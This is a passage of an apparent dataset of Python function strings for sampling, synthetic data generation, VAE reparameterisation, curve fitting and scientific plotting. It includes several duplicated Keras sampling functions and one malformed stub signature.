[{'dh': list_dh_sub[i], 'coords': list_coords_sub[i], 'i':i, 'max_i':nrun} for i in range(nrun)]\n list_df = pool.map(partial(wrapper_get_empirical_variogram, **kwargs), argsin, chunksize=1)\n pool.close()\n pool.join()\n\n list_df_nb = []\n for i in range(10):\n df_nb = list_df[i]\n df_nb['run'] = i\n list_df_nb.append(df_nb)\n df = pd.concat(list_df_nb)\n\n # group results, use mean as empirical variogram, estimate sigma, and sum the counts\n df_grouped = df.groupby('bins', dropna=False)\n df_mean = df_grouped[['exp']].mean()\n df_sig = df_grouped[['exp']].std()\n df_count = df_grouped[['count']].sum()\n df_mean['bins'] = df_mean.index.values\n df_mean['exp_sigma'] = df_sig['exp']\n df_mean['count'] = df_count['count']\n df = df_mean\n\n return df",
"def sample_input_domain(num_samples):\n s1 = np.random.random(num_samples) * 10\n s2 = np.random.random(num_samples) * 2 - 5\n s3 = np.random.random(num_samples)\n s4 = np.random.random(num_samples) * 30 + 20\n return s1, s2, s3, s4",
"def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)",
"def generate_data(func, points, seed=0):\n np.random.seed(seed)\n\n data = []\n for segment in points:\n x = np.linspace(*segment[\"xlim\"], num=segment[\"n_points\"])\n distribution = func(x)\n # Generate observations\n y = distribution.rvs()\n df = pd.DataFrame({\"x\": x, \"y\": y})\n data.append(df)\n\n return pd.concat(data, ignore_index=True)",
"def sampler(xaxis, yaxis, vals, x, y):\n i = 0\n while xaxis[i] < x:\n i += 1\n j = 0\n while yaxis[j] < y:\n j += 1\n return vals[i, j]",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.shape(z_mean)[1]\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def gen_fval_xs(funcs, n_inits, xdim, xmin, xmax, dtype=tf.float32, name='test'):\n if isinstance(funcs, list):\n print(\"List of functions\")\n\n n_funcs = len(funcs)\n xs_list = [[tf.get_variable(shape=(1,xdim), dtype=dtype, name='{}_{}_{}'.format(name, i, j),\n constraint=lambda x: tf.clip_by_value(x, xmin, xmax)) for i in range(n_inits)] for j in range(n_funcs)]\n\n xs = []\n for i in range(n_funcs):\n xs.append( tf.stack(xs_list[i]) )\n xs = tf.stack(xs)\n\n fvals = []\n for i in range(n_funcs):\n fvals_i = []\n for j in range(n_inits):\n fvals_i.append( tf.squeeze(funcs[i](xs_list[i][j])) )\n\n fvals.append( tf.squeeze(tf.stack(fvals_i)) )\n\n fvals = tf.stack(fvals)\n\n else: # funcs is a function\n print(\"A function\")\n xs_list = [tf.get_variable(shape=(1,xdim), dtype=dtype, name='test_func_mul_init_{}'.format(i),\n constraint=lambda x: tf.clip_by_value(x, xmin, xmax)) for i in range(n_inits)]\n\n fvals = [funcs(x) for x in xs_list]\n\n xs = tf.reshape(tf.concat(xs_list, axis=0), shape=(n_inits, xdim))\n fvals = tf.squeeze(tf.concat(fvals, axis=0))\n\n return xs, xs_list, fvals",
"def samples_multidimensional_uniform(bounds, points_count):\n dim = len(bounds)\n Z_rand = np.zeros(shape=(points_count, dim))\n for k in range(0,dim):\n Z_rand[:,k] = np.random.uniform(low=bounds[k][0], high=bounds[k][1], size=points_count)\n print('shape: ', Z_rand.shape)\n return Z_rand",
"def sampling(args):\n t_mean, t_log_var = args\n # YOUR CODE HERE\n epsilon = K.random_normal(t_mean.shape)\n z = epsilon * K.exp(0.5 * t_log_var) + t_mean\n return z",
"def sampling(args):\r\n\r\n z_mean, z_log_var = args\r\n batch = K.shape(z_mean)[0]\r\n dim = K.int_shape(z_mean)[1]\r\n # by default, random_normal has mean=0 and std=1.0\r\n epsilon = K.random_normal(shape=(batch, dim))\r\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def example_data(fs, Ts):\n\n # Number of points\n N = Ts * fs\n\n # random signals\n phi = np.pi / 2\n ax = [np.sin(2 * np.pi * 2 * (i / fs)) for i in range(N)]\n ay = [np.sin(2 * np.pi * 2 * (i / fs) + phi) for i in range(N)]\n Rx = [a * 0.01 + 0.5 for a in ax]\n Ry = [a * 0.01 + 0.3 for a in ay]\n\n # Make some noise!\n noise1 = np.random.normal(0, 0.1, N)\n noise2 = np.random.normal(0, 0.1, N)\n noise3 = np.random.normal(0, 0.1, N)\n noise4 = np.random.normal(0, 0.1, N)\n\n ax = ax + noise1\n ay = ay + noise2\n Rx = Rx + noise3\n Ry = Ry + noise4\n\n return ax, ay, Rx, Ry",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def Generate_Custom(f, n, m):\n return np.fromfunction(np.vectorize(f, otypes=[float]), (n,m))",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean = 0 and std = 1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def resample_2d(array, sample_pts, query_pts, kind='linear'):\n interpf = interpolate.interp2d(*sample_pts, array, kind=kind)\n return interpf(*query_pts)",
"def filters(data, f_interval, f_resolution=None, sampling=None, w_column=None):\n print('-------------------------- filters')\n\n # Avoid overwritting data:\n data0 = data.copy()\n \n # Avoid 0 as input as not peaks are found:\n if f_interval[0]==0:\n f_interval = [f_resolution, f_interval[1]]\n \n # Calculates power spectrum:\n Pf_power, P_comp, _, _, = tt.power(data0, f_interval, f_resolution, sampling, w_column)\n t = data0[:,0]\n f = Pf_power[:,0]\n alpha = P_comp[:,0] \n beta = P_comp[:,1]\n\n # Calculates P_filter:\n P_filter = np.zeros(len(t))\n fpicon = 2*np.pi*f # Optimization constant\n for i in range(len(t)):\n tfpicon = fpicon*t[i] # Optimization constant\n alpha_sin = alpha*np.sin(tfpicon)\n beta_cos = beta* np.cos(tfpicon)\n P_filter[i] = np.sum(alpha_sin + beta_cos)\n\n # Calculates window function:\n Pf_window = tt.window(data0, f_interval, f_resolution, sampling)\n P_window = Pf_window[:,1]\n \n # Bandpass/Lowpass and Highpass filter:\n S_low_band = P_filter/np.sum(P_window)\n S_high = data0[:,1]-S_low_band\n St_low_band = np.vstack([t, S_low_band]).T\n St_high = np.vstack([t, S_high]).T\n return St_low_band, St_high",
"def generate_continuous_data_and_targets(\n n_dim,\n n_samples,\n mixing_factor=0.025,\n frac_positive=0.1):\n cov = generate_positive_semi_definite_matrix(n_dim)\n X = np.random.multivariate_normal(\n mean=np.zeros(n_dim),\n cov=cov,\n size=n_samples)\n weights = np.random.randn(n_dim)\n y_probs = sigmoid(mixing_factor * np.dot(X, weights))\n y = np.random.binomial(1, p=y_probs)\n X, y = subsample(X, y, frac_positive)\n return X, y",
"def variational_mfvi_sample(n_sample, qf_mean, qf_sdev,\n mfvi_mixture=False, mixture_par_list=None,\n **kwargs):\n\n \"\"\"Generates f samples from GPR mean-field variational family.\"\"\"\n q_f = tfd.MultivariateNormalDiag(loc=qf_mean, scale_diag=qf_sdev, )\n q_f_sample = q_f.sample(n_sample)\n\n if mfvi_mixture:\n (mixture_logits, mixture_logits_mfvi_mix,\n mean_mfvi_mix, sdev_mfvi_mix) = mixture_par_list\n\n q_f_sample_mfvi = inference_util.sample_mfvi_mixture_family(\n N_sample=n_sample,\n mixture_logits=mixture_logits_mfvi_mix,\n mean_mfvi_mix=mean_mfvi_mix,\n sdev_mfvi_mix=sdev_mfvi_mix, )\n\n mix_prob = tf.nn.softmax(mixture_logits)\n\n q_f_sample = tf.tensordot(\n tf.stack([q_f_sample_mfvi, q_f_sample], axis=-1), mix_prob,\n axes=[[-1], [0]])\n\n return q_f_sample",
"def sample (self, n):\n y = self.bins\n x = np.r_[0, self.values.cumsum ()] / self.sum\n # interpolate inverse CDF\n out = np.interp (np.random.random (n), x, y)\n if n == 1:\n return out[0]\n else:\n return out.reshape ((n,))",
"def show_trace_2d(f, results):\n plt.close()\n # draw input points\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n # get the field of figure\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n # draw the contour of function using x1,x2 as step\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()",
"def vary_fit(xvalues, yvalues, d_sample, r1_func, f_i, thetaS_i, phiS_i, phiS_max):\n params1 = Parameters()\n params1.add('ds', value=d_sample, vary=False)\n params1.add('thetaS', value=thetaS_i, min=0, max=d_sample)\n params1.add('f', value=f_i, min=3, max=300000)\n ## originally max was 1\n params1.add('phiS', value=phiS_i, min=0, max=phiS_max)\n params1.add('w', value=2.0/3.0, vary=False)\n params1.add('a', value=4.0/3.0, vary=False)\n ##originally thetaP, phiP had no minima\n params1.add('thetaP', expr='(ds*(1 + phiS*w*f + a*thetaS)-thetaS)/ \\\n ((1 - a*ds)*(phiS*w*f + a*thetaS)-(a*ds))')\n params1.add('phiP', expr='phiS*thetaP/thetaS')\n params1.add('c', expr='w*phiS*f/(1+w*phiS*f+thetaS*a)')\n params1.add('dp', expr='thetaP/(1+a*thetaP)')\n params1.add('dc', expr='thetaS/(1+a*thetaS)')\n minner1 = Minimizer(fcn2min, params1, fcn_args=(xvalues, yvalues, r1_func))\n try:\n fitres1 = minner1.minimize()\n except:\n fitres1 = None\n return fitres1",
"def testing_input_fn():\n dataset = tf.data.Dataset.range(len(cube_features))\n dataset = dataset.batch(16)\n dataset = dataset.map(mapping_function)\n return dataset",
"def simple_sampler(fun, start, sigma, iterations, verbose=False):\n mean = np.zeros(len(start))\n cov = np.eye(len(start)) * sigma\n\n if isinstance(start, np.ndarray):\n previous = start\n else:\n previous = np.array(start)\n\n f_previous = fun(previous)\n\n samples = np.zeros((iterations, len(start)))\n acceptance = 0\n for i in range(iterations):\n proposal = previous + np.random.multivariate_normal(mean=mean, cov=cov)\n f_proposal = fun(proposal)\n fun(previous)\n if (np.log(np.random.rand())) < (f_proposal - f_previous):\n previous = proposal\n acceptance += 1\n samples[i] = np.array(previous)\n\n if verbose:\n print('sampler acceptance = {0:.3f}'.format(acceptance / iterations))\n\n return samples",
"def _generate_data(n_inliers, n_outliers, n_features, coef, offset,\n random_state):\n\n inliers = coef * random_state.randn(n_inliers, n_features) + offset\n outliers = random_state.uniform(low=-1 * offset, high=offset,\n size=(n_outliers, n_features))\n X = np.r_[inliers, outliers]\n\n y = np.r_[np.zeros((n_inliers,)), np.ones((n_outliers,))]\n\n return X, y",
"def gen_data_for_plot(data, x, z=None, rand_sample_vars=[], mean_sample_vars=[], const_vars={}, stages='balanced', nstages=5, samples_per_x_range=500, truncate_to_percentile=0):\n data_points = data.copy()\n unq_x = data[x].unique()\n if len(unq_x) < 7: #catergorical\n x_data = data[x].sample(samples_per_x_range).values\n else:\n if truncate_to_percentile:\n x_data = np.linspace(np.percentile(data[x],truncate_to_percentile), np.percentile(data[x],100-truncate_to_percentile), samples_per_x_range)\n else:\n x_data = np.linspace(data[x].min(), data[x].max(), samples_per_x_range)\n df = pd.DataFrame({x:x_data})\n for var in mean_sample_vars:\n var_mean = data[var].mean(skipna=True)\n var_std = data[var].std(skipna=True)\n df[var] = var_mean\n data_points = data_points.loc[(var_mean-var_std<data_points[var]) & (data_points[var]<var_mean+var_std),:]\n\n for var in rand_sample_vars:\n df[var] = np.random.choice(data[var], size=(samples_per_x_range, ))\n\n for var, val in const_vars.items():\n df[var] = [val] * samples_per_x_range\n if 'consider' not in var:\n var_std = data[var].std(skipna=True)\n data_points = data_points.loc[(val - var_std < data_points[var]) & (data_points[var] < val + var_std), :]\n\n if stages == 'balanced':\n df_stages = pd.DataFrame({'current_epoch':list(range(nstages))})\n n_reps = int(np.ceil(df.shape[0]/df_stages.shape[0]))\n df_stages = pd.concat([df_stages]*n_reps, axis=0).iloc[0:samples_per_x_range,:].reset_index(drop=True)\n df_stages = df_stages.sample(frac=1).reset_index(drop=True)\n df = pd.concat([df, df_stages], axis=1, sort=False)\n\n if z is not None:\n data_cont = []\n unique_z = data[z].unique()\n if len(unique_z) >= 7: # make cont into categorical\n unique_z = np.linspace(data[z].min(), data[z].max(), 7)\n unique_z += (unique_z[1] - unique_z[0])/2\n unique_z = unique_z[:-1]\n\n for z_val in unique_z:\n new_df = df.copy()\n new_df[z] = z_val\n data_cont.append(new_df)\n df = pd.concat(data_cont, axis=0)\n\n return df, data_points",
"def _nd_plot_samples(self, **kwargs):\n\n from pesummary.core.plots.plot import _make_comparison_corner_plot as plotfunc\n\n plotkwargs = kwargs.copy()\n\n args = [self._samples]\n plotkwargs[\"corner_parameters\"] = self.parameters\n if \"latex_labels\" not in kwargs:\n plotkwargs[\"latex_labels\"] = self.latex_labels\n\n if \"plot_percentile\" not in kwargs:\n plotkwargs[\"plot_percentile\"] = False\n\n # get ranges for each parameter to set figure axes extents\n if \"range\" not in kwargs:\n range = []\n for param in self.parameters:\n range.append(\n [\n np.min(\n [samps[param].min() for samps in self._samples.values()]\n ),\n np.max(\n [samps[param].max() for samps in self._samples.values()]\n ),\n ]\n )\n plotkwargs[\"range\"] = range\n\n # default to not show quantile lines\n plotkwargs.setdefault(\"quantiles\", None)\n\n # set default injection line color\n plotkwargs.setdefault(\"truth_color\", \"k\")\n\n # set injection parameter values\n if self.injection_parameters is not None:\n injpars = [\n self.injection_parameters[p] - self.parameter_offsets[p]\n for p in self.parameters\n if self.injection_parameters[p] is not None\n ]\n if len(injpars) == self._num_parameters:\n plotkwargs[\"truths\"] = injpars\n\n # create plot\n with DisableLogger():\n fig = plotfunc(*args, **plotkwargs)\n\n # turn frame off on legend\n fig.legends[0].set_frame_on(False)\n\n return fig",
"def get_gaussian_axis_sample(a, b, N, dtype):\n assert a < b, \"condition a < b violated!\"\n assert isinstance(N, int), \"condition N of type int violated!\"\n\n data = []\n for n in range(N):\n x = a + get_norm_cdf(N)[n]*(b-a)\n if dtype is int:\n data.append(int(x))\n elif dtype is float:\n data.append(x)\n else:\n raise AssertionError(\"dtype {} not supported for uniform sampling!\".format(dtype))\n return data",
"def distr_of_function(dstn, func=lambda x: x, *args):\n # Apply function to every event realization\n f_query = [func(dstn.atoms[..., i], *args) for i in range(len(dstn.pmv))]\n\n # Stack results along their last (new) axis\n f_query = np.stack(f_query, axis=-1)\n\n f_dstn = DiscreteDistribution(dstn.pmv, f_query)\n\n return f_dstn",
"def InterpolateFunctions(self, , p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=...):\n ...",
"def eval_r_func_3(f, x, y, t):\n elementary_func = ['prod', 'avg', 'cos_pi', 'sin_pi']\n if f[0] == \"x\":\n return x\n elif f[0] == \"y\":\n return y\n elif f[0] == \"t\":\n return t\n else:\n if f[0] == elementary_func[0]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return first_argument * second_argument\n elif f[0] == elementary_func[1]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return .5*(first_argument + second_argument)\n elif f[0] == elementary_func[2]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.cos(math.pi * argument)\n return ans\n elif f[0] == elementary_func[3]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.sin(math.pi * argument)\n return ans",
"def sliced_fun(f, n_slices):\n\n def sliced_f(sliced_inputs, non_sliced_inputs=None):\n if non_sliced_inputs is None:\n non_sliced_inputs = []\n if isinstance(non_sliced_inputs, tuple):\n non_sliced_inputs = list(non_sliced_inputs)\n n_paths = len(sliced_inputs[0])\n slice_size = max(1, n_paths // n_slices)\n ret_vals = None\n for start in range(0, n_paths, slice_size):\n inputs_slice = [v[start:start + slice_size] for v in sliced_inputs]\n slice_ret_vals = f(*(inputs_slice + non_sliced_inputs))\n if not isinstance(slice_ret_vals, (tuple, list)):\n slice_ret_vals_as_list = [slice_ret_vals]\n else:\n slice_ret_vals_as_list = slice_ret_vals\n scaled_ret_vals = [\n np.asarray(v) * len(inputs_slice[0])\n for v in slice_ret_vals_as_list\n ]\n if ret_vals is None:\n ret_vals = scaled_ret_vals\n else:\n ret_vals = [x + y for x, y in zip(ret_vals, scaled_ret_vals)]\n ret_vals = [v / n_paths for v in ret_vals]\n if not isinstance(slice_ret_vals, (tuple, list)):\n ret_vals = ret_vals[0]\n elif isinstance(slice_ret_vals, tuple):\n ret_vals = tuple(ret_vals)\n return ret_vals\n\n return sliced_f",
"def mpld3_multivariate_2d_gd(\n filename: str= \"\",\n name_labels: List[str] = [],\n colors: List[str] = [],\n functions: list = [], # list of funtions\n target_function: List[np.ndarray] = [],\n cmap_target: List[str] = [],\n label_target: List[str] = [],\n fedavg_clients=None,\n fedavg_eval=None,\n fedavg_communication_rounds: List[int] = [10],\n fedavg_steps_local: List[int] = [10],\n title: str = \"\",\n hist_slice=slice(None),\n theta=START_THETA,\n):\n assert (\n len(name_labels) == len(colors) == len(functions)\n ), \"incorrect settings. for each function, specify a matplotlib color and label name\"\n\n assert (\n len(target_function) == len(cmap_target) == len(label_target) \n ), \"incorrect settings. only one target function can be plotted\"\n\n print(\n f\"create 2D plot using SGD on {list(zip(name_labels, colors))}\"\n f\" over distribution {label_target}\"\n )\n\n # 2D Settings\n fig = plt.figure()\n ax = plt.gca()\n \n offset_contour = -0.15\n labels_all = []\n plots_all = []\n plots_hover = []\n hover_label = []\n visibillity_label = []\n ax.set_xlabel('\\u03F4_0', fontdict={'fontsize': 18})\n ax.set_ylabel('\\u03F4_1', fontdict={'fontsize': 18})\n \n\n # plot target function\n for i in range(len(target_function)):\n plotted = ax.contourf(\n X,\n Y,\n target_function[i],\n cmap=cmap_target[i],\n zorder=0,\n alpha=.97,\n ).collections\n plots_all.append(plotted)\n labels_all.append(f\"toggle {label_target[i]}\")\n if i == 0:\n visibillity_label.append(True)\n else:\n visibillity_label.append(False)\n # hover_label.append(\"\")\n \n # history of regular GD\n for i in range(len(name_labels)):\n history = grad_descent(functions[i], theta = theta)\n history = history[hist_slice]\n plotted, = ax.plot(\n history[:, 0],\n history[:, 1],\n label=name_labels[i],\n c=colors[i],\n lw=5,\n zorder=100,\n )\n plots_all.append(plotted)\n labels_all.append(f\"toggle {name_labels[i]}\")\n plots_hover.append(plotted)\n hover_label.append(f\"{name_labels[i]}_acc_{str(history[-1, 2])[:5]}\")\n if i == 0:\n visibillity_label.append(True)\n else:\n visibillity_label.append(False)\n\n\n # history of FedAvg\n if fedavg_clients is not None:\n for i in range(len(fedavg_communication_rounds)):\n hs, h_clients = fedavg(\n function_clients=fedavg_clients,\n function_eval=fedavg_eval,\n communication_rounds=fedavg_communication_rounds[i],\n gd_steps_local=fedavg_steps_local[i],\n theta = theta,\n )\n hs = hs[hist_slice]\n plotted, = ax.plot(hs[:, 0], hs[:, 1], label=\"FedAvg\", c=\"red\", lw=5, zorder=100)\n \n plots_all.append(plotted)\n labels_all.append(f\"toggle FedAvg_rounds_{fedavg_communication_rounds[i]}_steps_{fedavg_steps_local[i]}\")\n plots_hover.append(plotted)\n hover_label.append(f\"FedAvg_acc_{str(hs[-1, 2])[:5]}_rounds_{fedavg_communication_rounds[i]}_steps_{fedavg_steps_local[i]}\")\n if i == 0:\n visibillity_label.append(True)\n else:\n visibillity_label.append(False)\n top = 3.5 \n height_from_top = top - len(labels_all) * 0.22\n height_to_top = 3.5 - height_from_top\n ax.add_patch(matplotlib.patches.Rectangle((1.8,height_from_top),1.7,height_to_top, facecolor='white', capstyle=\"round\"))\n \n if title:\n ax.set_title(title, fontdict={'fontsize': 18})\n\n fig.savefig(f\"{filename}.svg\")\n\n if \"mpld3\" in sys.modules:\n interactive_legend = mpld3.plugins.InteractiveLegendPlugin(plots_all, labels_all, alpha_over=1.5, alpha_unsel=0.2, \n start_visible=visibillity_label, font_size=18, legend_offset=(-255,-5)) # -1050,-5\n \n hover = [mpld3.plugins.LineLabelTooltip(pl,label=lb) for pl, lb in zip( plots_hover, hover_label)]\n mpld3.plugins.connect(fig, interactive_legend, *hover)\n \n\n # Show the interactive figure in the notebook\n mpld3.display()\n mpld3.save_html(fig, f\"{filename}.html\")\n \n # try to creat figure mpld3, but 3d plots are not supported.\n return fig",
"def input_fn(params):\n assert params[\"batch_size\"] * num_core_per_host == bsz_per_host\n\n datasets = []\n for files, func in zip(file_list, func_list):\n if files:\n cur_dataset = func(\n params=params,\n num_hosts=num_hosts,\n num_core_per_host=num_core_per_host,\n is_training=split == \"train\",\n file_names=files,\n seq_len=seq_len,\n num_predict=num_predict,\n use_bfloat16=use_bfloat16,\n **kwargs)\n\n datasets.append(cur_dataset)\n\n if len(datasets) > 1:\n dataset = tf.data.experimental.sample_from_datasets(datasets)\n elif len(datasets) == 1:\n dataset = datasets[0]\n\n return dataset",
"def generate_dataset_zipf(n, alpha=1.1):\n return [(np.random.zipf(alpha), 1) for _ in range(n)]",
"def fcontourf(f, x1range, x2range, yrange, **kwargs):\n x1s = np.linspace(x1range[0], x1range[1])\n x2s = np.linspace(x2range[0], x2range[1])\n ys = np.linspace(yrange[0], yrange[1], 20)\n fs = [[f(np.array([x1,x2])) for x1 in x1s] for x2 in x2s]\n plt.contourf(x1s, x2s, fs, ys, **kwargs)\n plt.axis('scaled')",
"def sample_1D_fromClass(manifold, f_on_manifold,\n n_samples, noise_level, tube = 'l2', var_f = 0.0,\n return_original = False, args_f = None):\n # Find length corresponding to end parameter b\n s_disc = np.random.uniform(low = manifold.get_start(),\n high = manifold.get_end(), size = (n_samples))\n # s_disc = np.sort(s_disc)\n n_features = manifold.get_n_features()\n # Containers\n basepoints = np.zeros((n_features, n_samples))\n points = np.zeros((n_features, n_samples))\n points_original = np.zeros((n_features, n_samples)) # Contains t + normal coefficients\n points_original[0,:] = s_disc\n tangentspaces = np.zeros((n_features, 1, n_samples))\n normalspaces = np.zeros((n_features, n_features - 1, n_samples))\n fval = np.zeros(n_samples)\n # Sample Detachment Coefficients\n if tube == 'linfinity':\n # Sample detachment coefficients from ||k||_inf < noise_level.\n random_coefficients = np.random.uniform(-noise_level, noise_level,\n size = (n_features - 1, n_samples))\n elif tube == 'l2':\n # Sample detachment coefficients from ||k||_2 < noise_level\n rand_sphere = np.random.normal(size = (n_features - 1, n_samples))\n rand_sphere = rand_sphere/np.linalg.norm(rand_sphere, axis = 0)\n radii = np.random.uniform(0, 1, size = n_samples)\n radii = noise_level * np.power(radii, 1.0/(n_features - 1))\n random_coefficients = rand_sphere * radii\n points_original[1:,:] = random_coefficients\n for i in range(n_samples):\n basepoints[:,i] = manifold.get_basepoint(s_disc[i])\n tangentspaces[:,0,i] = manifold.get_tangent(s_disc[i])\n normalspaces[:,:,i] = manifold.get_normal(s_disc[i])\n normal_vector = np.sum(normalspaces[:,:,i] * random_coefficients[:,i],\n axis=1)\n points[:,i] = basepoints[:,i] + normal_vector\n if args_f is not None:\n fval[i] = f_on_manifold(np.array([s_disc[i]]), manifold.get_start(), manifold.get_end(), *args_f)\n else:\n fval[i] = f_on_manifold(np.array([s_disc[i]]))\n # Apply noise to the function values\n fval_clean = np.copy(fval)\n if var_f > 0.0:\n Ymin, Ymax = np.min(fval_clean), np.max(fval_clean)\n avg_grad = (Ymax - Ymin)/(manifold.get_end() - manifold.get_start())\n fval_noise = np.random.uniform(low = -avg_grad * np.sqrt(var_f), high = avg_grad * np.sqrt(var_f),\n size = n_samples)\n fval += fval_noise\n if return_original:\n return s_disc, points, points_original, normalspaces, fval, fval_clean,\\\n tangentspaces, basepoints\n else:\n return s_disc, points, normalspaces, fval, fval_clean,\\\n tangentspaces, basepoints",
"def _2d_plot_samples(self, **kwargs):\n\n from pesummary.core.plots.bounded_2d_kde import Bounded_2d_kde\n\n # get bounds\n lows = []\n highs = []\n methods = []\n for param in self.parameters[0:2]:\n if param in DEFAULT_BOUNDS:\n lows.append(\n DEFAULT_BOUNDS[param][\"low\"]\n if \"low\" in DEFAULT_BOUNDS[param]\n else None\n )\n highs.append(\n DEFAULT_BOUNDS[param][\"high\"]\n if \"high\" in DEFAULT_BOUNDS[param]\n else None\n )\n methods.append(\n DEFAULT_BOUNDS[param][\"method\"]\n if \"method\" in DEFAULT_BOUNDS[param]\n else \"Reflection\"\n )\n\n if self.plottype == \"triangle\":\n from pesummary.core.plots.publication import triangle_plot as plotfunc\n elif self.plottype == \"reverse_triangle\":\n from pesummary.core.plots.publication import (\n reverse_triangle_plot as plotfunc,\n )\n else:\n # contour plot\n from pesummary.core.plots.publication import (\n comparison_twod_contour_plot as plotfunc,\n )\n\n # set KDE information\n kwargs.update(\n {\n \"kde\": Bounded_2d_kde,\n \"kde_kwargs\": {\n \"xlow\": lows[0],\n \"xhigh\": highs[0],\n \"ylow\": lows[1],\n \"yhigh\": highs[1],\n },\n }\n )\n\n # default to not showing data points\n if \"plot_datapoints\" not in kwargs:\n kwargs[\"plot_datapoints\"] = False\n\n if \"triangle\" in self.plottype:\n from pesummary.core.plots.bounded_1d_kde import bounded_1d_kde\n\n # set KDE informaiton\n kwargs.update(\n {\n \"kde_2d\": Bounded_2d_kde,\n \"kde_2d_kwargs\": {\n \"xlow\": lows[0],\n \"xhigh\": highs[0],\n \"ylow\": lows[1],\n \"yhigh\": highs[1],\n },\n \"kde\": bounded_1d_kde,\n }\n )\n\n kwargs[\"kde_kwargs\"] = {\n \"x_axis\": {\"xlow\": lows[0], \"xhigh\": highs[0], \"method\": methods[0]},\n \"y_axis\": {\"xlow\": lows[1], \"xhigh\": highs[1], \"method\": methods[1]},\n }\n\n args = [\n [samps[self.parameters[0]].values for samps in self._samples.values()],\n [samps[self.parameters[1]].values for samps in self._samples.values()],\n ]\n\n if \"xlabel\" not in kwargs:\n kwargs[\"xlabel\"] = self.latex_labels[self.parameters[0]]\n if \"ylabel\" not in kwargs:\n kwargs[\"ylabel\"] = self.latex_labels[self.parameters[1]]\n\n if \"labels\" not in kwargs and len(self.results) > 1:\n kwargs[\"labels\"] = list(self._samples.keys())\n\n # set injection parameter values\n if self.injection_parameters is not None:\n if (\n self.injection_parameters[self.parameters[0]] is not None\n and self.injection_parameters[self.parameters[1]] is not None\n ):\n kwargname = \"truths\" if self.plottype == \"corner\" else \"truth\"\n kwargs[kwargname] = [\n self.injection_parameters[self.parameters[0]]\n - self.parameter_offsets[self.parameters[0]],\n self.injection_parameters[self.parameters[1]]\n - self.parameter_offsets[self.parameters[1]],\n ]\n\n # create plot\n with DisableLogger():\n fig = plotfunc(*args, **kwargs)\n\n return fig",
"def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z",
"def gen_data(n_samples=200):\r\n\tnp.random.seed(13)\r\n\tx = np.random.uniform(0,10,size=n_samples) #从一个均匀分布[0,10)中随机采样\r\n\tx.sort()\r\n\ty = ground_truth(x) + 0.75*np.random.normal(size=n_samples) #均值为0,标准差为1的正态分布\r\n\t#print(\"x, y: \", x[:10], y[:10])\r\n\ttrain_mask = np.random.randint(0,2,size=n_samples).astype(np.bool) #返回值为True or False\r\n\t#print(\"train_mask: \",train_mask[:10])\r\n\tx_train, y_train = x[train_mask, np.newaxis], y[train_mask] #如果train_mask是1,就将x,y作为训练集,np.newaxis表示将行向量转为列向量\r\n\t#print(\"x_train, y_train: \", x_train[:10], y_train[:10])\r\n\tx_test, y_test = x[~train_mask, np.newaxis], y[~train_mask] #train_mask为False,将x,y作为测试集\r\n\t#print(\"x_test, y_test: \", x_test[:10], y_test[:10])\r\n\treturn x_train, x_test, y_train, y_test",
